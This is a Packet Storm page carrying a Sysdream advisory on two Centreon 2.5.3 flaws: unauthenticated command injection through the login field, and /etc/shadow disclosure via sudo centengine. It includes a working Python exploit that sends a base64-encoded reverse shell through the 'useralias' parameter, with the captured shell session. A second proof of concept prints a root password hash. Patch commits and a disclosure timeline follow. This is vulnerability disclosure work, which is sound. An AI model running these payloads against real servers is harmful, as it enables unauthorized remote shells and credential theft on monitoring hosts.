Twenty Year Anniversary

Centreon 2.5.3 Code Execution

Centreon 2.5.3 Code Execution
Posted Feb 26, 2016
Authored by Nicolas Chatelain

Centreon versions 2.5.3 and below suffer from a remote code execution vulnerability.

tags | exploit, remote, code execution
MD5 | 40b9869aaae9701f0648ec3012fe5f27

Centreon 2.5.3 Code Execution

Change Mirror Download
Unauthenticated Remote Command Execution in Centreon Web Interface
==================================================================


Description
===========

Centreon is a popular monitoring solution.

A critical vulnerability has been found in the Centreon logging class
allowing remote users to execute arbitrary commands.


SQL injection leading to RCE
============================

Centreon logs SQL database errors in a log file using the "echo" system
command and the exec() PHP function. On the authentification class,
Centreon use htmlentities with the ENT_QUOTES options to filter SQL
entities.
However, Centreon doesn't filter the SQL escape character "\" and it is
possible to generate an SQL Error.
Because of the use of the "echo" system command with the PHP exec()
function, and because of the lack of sanitization, it is possible to
inject arbitrary system commands.

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-78

----------------
Proof of Concept
----------------

TCP Reverse Shell using python.

#!/usr/bin/env python
import requests
import argparse

def shell(target, reverseip, reverseport):
payload = 'import socket as a,subprocess as b,os as
c;s=a.socket(2,1);s.connect(("%s",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call(["sh"]);'
% (reverseip,reverseport)
print "[~] Starting reverseshell : %s - port : %d" % (reverseip,
reverseport)
req = requests.post(target, data={"useralias": "$(echo %s |
base64 -d | python)\\" % payload.encode("base64").replace("\n",""),
"password": "foo"})
print "[+] DEAD !"

if __name__ == "__main__":
print "[~] Centreon Unauthentificated RCE - Nicolas Chatelain
<n.chatelain@sysdream.com>"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True)
parser.add_argument("--reverseip", required=True)
parser.add_argument("--reverseport", required=True, type=int)
args = parser.parse_args()
shell(args.target, args.reverseip, args.reverseport)

Shell :

nightlydev@nworkstation ~/Lab/Centreon $ python reverseshell.py
--target=http://172.16.138.137/centreon/index.php
--reverseip=172.16.138.1 --reverseport 8888
[~] Centreon Unauthentificated RCE - Nicolas Chatelain
<n.chatelain@sysdream.com>
[~] Starting reverseshell : 172.16.138.1 - port : 8888

# Other term

nightlydev@nworkstation ~/Lab/Centreon $ nc -lvp 8888
Ncat: Version 6.45 ( http://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 172.16.138.135.
Ncat: Connection from 172.16.138.135:50050.
whoami
apache
groups
apache centreon-engine centreon-broker centreon nagios


---------------
Vulnerable code
---------------

The vulnerable code is located in class/centreonLog.class.php, line 82
and line 154:


/*
* print Error in log file.
*/
exec("echo \"".$string."\" >> ".$this->errorType[$id]);

In class/centreonAuth.class.php, line 227:

$DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE
`contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "'
AND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1");


--------
Solution
--------

Update to the Centreon 2.5.4


Possible root password disclosure in centengine (Centreon Entreprise Server)
============================================================================

In some configurations, when centengine can run as root (with sudo).
It's possible to read some file content.

**Access Vector**: local

**Security Risk**: high

**Vulnerability**: CWE-209

----------------
Proof of Concept
----------------

$ sudo /usr/sbin/centengine -v /etc/shadow
[1416391088] reading main config file
[1416391088] error while processing a config file: [/etc/shadow:1]
bad variable name:
'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'
[1416391088]

---------------
Vulnerable code
---------------

In Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon

CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *

--------
Solution
--------

Do not allow centengine to be run as root or do not disclose the line
that caused the error.

Timeline (dd/mm/yyyy)
=====================

* 18/11/2014 : Initial discovery
* 26/11/2014 : Contact with Centreon team
* 27/11/2014 : Centreon correct vulnerabilities
* 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities

Fixes
=====

*
https://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9
*
https://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d
*
https://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1

Affected versions
=================

* Centreon <= 2.5.3


Credits
=======

* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)


Best regards,
--
SYSDREAM Labs <labs@sysdream.com>

GPG :
47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website: https://sysdream.com/
* Twitter: @sysdream


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

April 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    5 Files
  • 2
    Apr 2nd
    17 Files
  • 3
    Apr 3rd
    11 Files
  • 4
    Apr 4th
    21 Files
  • 5
    Apr 5th
    17 Files
  • 6
    Apr 6th
    12 Files
  • 7
    Apr 7th
    1 Files
  • 8
    Apr 8th
    6 Files
  • 9
    Apr 9th
    21 Files
  • 10
    Apr 10th
    18 Files
  • 11
    Apr 11th
    42 Files
  • 12
    Apr 12th
    7 Files
  • 13
    Apr 13th
    14 Files
  • 14
    Apr 14th
    1 Files
  • 15
    Apr 15th
    1 Files
  • 16
    Apr 16th
    15 Files
  • 17
    Apr 17th
    20 Files
  • 18
    Apr 18th
    24 Files
  • 19
    Apr 19th
    20 Files
  • 20
    Apr 20th
    7 Files
  • 21
    Apr 21st
    10 Files
  • 22
    Apr 22nd
    2 Files
  • 23
    Apr 23rd
    17 Files
  • 24
    Apr 24th
    24 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close